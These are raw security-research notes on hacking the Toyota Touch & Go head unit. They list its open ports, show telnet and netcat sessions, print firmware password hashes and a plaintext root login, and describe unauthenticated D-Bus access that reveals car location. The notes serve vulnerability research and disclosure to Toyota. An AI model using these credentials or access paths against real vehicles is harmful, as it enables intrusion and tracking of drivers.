Presentation slides from 2012: HappyHackingToyotaTouchAndGo.pdf
Hacking Toyota Touch & Go
New Toyotas can be connected to the Internet via bluetooth. We wanted to know what is going on under the hood. You can find our raw notes from here. These are our raw notes for fellow hackers to continue the work.
Yes. We found similar vulnerabilities as in famous Jeep #CarHack by Charlie Miller and Chris Valasek found. You can find their great research from here: http://illmatics.com/Remote%20Car%20Hacking.pdf
Contents
Instructions from mytoyota.com
Free and paid content can be added to your account on the download services section of this portal. To ensure you install the content correctly onto your Toyota Touch & Go follow the steps below: Create a fingerprint of your Toyota Touch & Go using your USB stick (see guide) Download and install the Toyota Touch & Go Toolbox on your PC (download page) Connect the USB stick to your PC and launch your toolbox Login to your Toyota Touch & Go Toolbox and follow the instructions to download and install your content (see guide)
There is devel documentation about the qnx platform..
e.g.
http://www.qnx.com/developers/docs/6.4.1/composition_manager/dev_guide/configuring.html
http://support7.qnx.com/download/download/20982/590.39_65_Quickstart_Guide_P6.pdf
http://haxor.fi/2012/10/how-the-firmware-updates-work-on-toyota-touch-go/
Discussion forum about T&G http://www.vleeuwen.net/forum/viewforum.php?f=3&sid=e1ac5c9c49fddcb5d1ed76f9ac395900
Firmware
Firmware http://download.naviextras.com/content/!application/Toyota/OS/EU_Low/2011_12_08/swdl.iso
/usr/share/swdl.bin looks interesting Strings findings:
root:C9v0PdmoRiQ9.:1303406650 toyota:QQkI3zYSmefdc
$ file usr/share/V850/teb.bin us/share/V850/teb.bin: 8086 relocatable (Microsoft)
usr/share/scripts/install.sh
QNX CAR Application Platform http://www.qnx.com/products/qnxcar/
Open services on QNX machine
- 23/tcp open telnet Openwall GNU/*/Linux telnetd
- 851/tcp open unknown
- 2021/tcp open servexec?
- 6020/tcp open unknown
- 6667/tcp open irc?
- 51500/tcp opn ????
23 telnet
$ telnet 172.20.10.6 Trying 172.20.10.6... Connected to 172.20.10.6. Escape character is '^]'. QNX Neutrino (localhost) (ttyp0) login:
Accounts are now publicly known. Harman were kind to share account information to everybody on their scrum wiki.
login: root password: Mc!AsR3
851 Logdump?
{{ $ nc 192.168.2.6 851 åGåLåLMar 18 14:56:00.050 5 00008 300 io-winmgr: starting up... Mar 18 14:56:00.177 5 10000 00 Service com.harman.service.ToyotaMGR just appeared at time 7.200323 seconds Mar 18 14:56:00.276 5 00008 300 io-winmgr: attached to iow-keyboard Mar 18 14:56:00.335 5 10000 00 pid 340019: Binary persistence for 'TM' is empty. Mar 18 14:56:00.500 5 00008 300 io-winmgr: no mouse Mar 18 14:56:00.507 5 00008 300 io-winmgr: attached to iow-touch Mar 18 14:56:00.697 5 00008 300 io-winmgr: no control Mar 18 14:56:00.840 5 10000 00 pid 458795: Binary persistence for 'HMI' is empty.
/FromLogUSBStickWithFancyFiles
2021
$ nc 172.20.10.6 2021 <GCF 000163 TS_10_0001081726>CTRL INFO IOFSMediaBT MSG='iofsmediabt_devctl(1617) DCMD_MEDIA_PLAYBACK_STATUS playstate: 2, speed: 0, playstate_flags: 0, trk_curr: 0, trk_total: 27, skipped: 2'; <GCF 000163 TS_10_0001082328>CTRL INFO IOFSMediaBT MSG='iofsmediabt_devctl(1617) DCMD_MEDIA_PLAYBACK_STATUS playstate: 2, speed: 0, playstate_flags: 0, trk_curr: 0, trk_total: 27, skipped: 2'; <GCF 000082 TS_10_0001082381>CALL Bluephone:507 BSS_HFP_Write handle=1 codec=CODEC_HEX data='41542B434C43430D'; <GCF 000055 TS_10_0001082382>CTRL INFO BSSService MSG='received event ET_DATA_SENT'; <GCF 000056 TS_10_0001082383>RESP Bluephone:507 BSS_HFP_Write error=WRITE_ERROR_NONE; <GCF 000059 TS_10_0001082417>CTRL INFO BSSService MSG='received event ET_DATA_RECEIVED';
6020
$ nc 192.168.2.6 6020 :CTRL CNFG GCFROUTER MODE=STANDARD;
It might be serial port to GPS navigation device http://www.digital-eliteboard.com/showthread.php?88164-Supportthread_1-Becker-Z099-Z1XX-Z2XX-Z302/page52&p=953416&viewfull=1#post953416
6667
If I connect to this port with telnet it will say: ERROR "Unknown command"
e.g:
$ telnet 192.168.2.4 6667 Trying 192.168.2.4... Connected to 192.168.2.4. Escape character is '^]'. foo ERROR "Unknown command"
with nc there is nothing.
Clues
- Migth be d-bus related:
unix:path=/tmp/dbus-MNzOp3X3nV,guid=e21d288fe52bc59a6d8e19c04bbccfd0;tcp:host=localhost,port=6667,family=ipv4,guid= 1b1a12b5fa8e657b3fd2d05b4bbccfd0
http://community.qnx.com/sf/discussion/do/listPosts/projects.ide/discussion.ide.topc13034
Bug reporter was: Glenn Schmottlach
He have done before: D-Bus Platform Support - Ported and adapted D-Bus to QNX where it serves as the primary application IPC mechanism for mid-tier head unit designs. Includes developing an alternative JSON based messaging protocol on top of D-Bus. http://www.linkedin.com/pub/glenn-schmottlach/4/396/a5
http://dbus.freedesktop.org/doc/dbus-specification.html#transports-exec
D-bus tests
Updated 2014-12 So.. it really was Dbus without any kind of authentication. You can get car coordinates, play any flash from the Internet on the screen etc. You really want to keep your car disconnected from the Internet. We have reported this to Toyota (2013-02) and they kindly answered (2013-05).
51500
After I say something to socket connection will close
Bluetooth
- Services:
- AVRCP Remote Contro
- Advanced Audio
- Hands-Free unit
- Personal Ad-hoc User Service
- Device Service Class 0x3b0
Key validation
# cat apps-eu.pub -----BEGIN PUBLIC KEY----- MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBALj9KV9l/wdmD5s9ZUrTWUpK6Gj8OxFj d7ErOfvz+63s8kI9WPvU3IFhtHQZKdn8arY6D2v9LzOV+k2v/t827FMCAwEAAQ== -----END PUBLIC KEY----- % openssl rsa -pubin -in ./fuu.pub -text Modulus (512 bit): 00:b8:fd:29:5f:65:ff:07:66:0f:9b:3d:65:4a:d3: 59:4a:4a:e8:68:fc:3b:11:63:77:b1:2b:39:fb:f3: fb:ad:ec:f2:42:3d:58:fb:d4:dc:81:61:b4:74:19: 29:d9:fc:6a:b6:3a:0f:6b:fd:2f:33:95:fa:4d:af: fe:df:36:ec:53 Exponent: 65537 (0x10001) writing RSA key -----BEGIN PUBLIC KEY----- MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBALj9KV9l/wdmD5s9ZUrTWUpK6Gj8OxFj d7ErOfvz+63s8kI9WPvU3IFhtHQZKdn8arY6D2v9LzOV+k2v/t827FMCAwEAAQ== -----END PUBLIC KEY-----
Links
https://www.jkry.org/ouluhack/Toyota%20Touch%20%26%20Go http://haxor.fi/2012/10/how-the-firmware-updates-work-on-toyota-touch-go/
http://muistio.tieke.fi/itB9pWrKmR
http://www.toyota.co.uk/cgi-bin/toyota/bv/frame_start.jsp?id=Nav_TouchGo
firmware update
http://download.naviextras.com/content/!application/Toyota/OS/EU_Low/2011_12_08/swdl.iso
http://www.itviikko.fi/uutiset/2012/03/06/fordin-vastaus-ongelmiin-muistitikku/201224651/7
- description
- Hacking Head Unit of Toyota Avensis (Toyota model in Europe)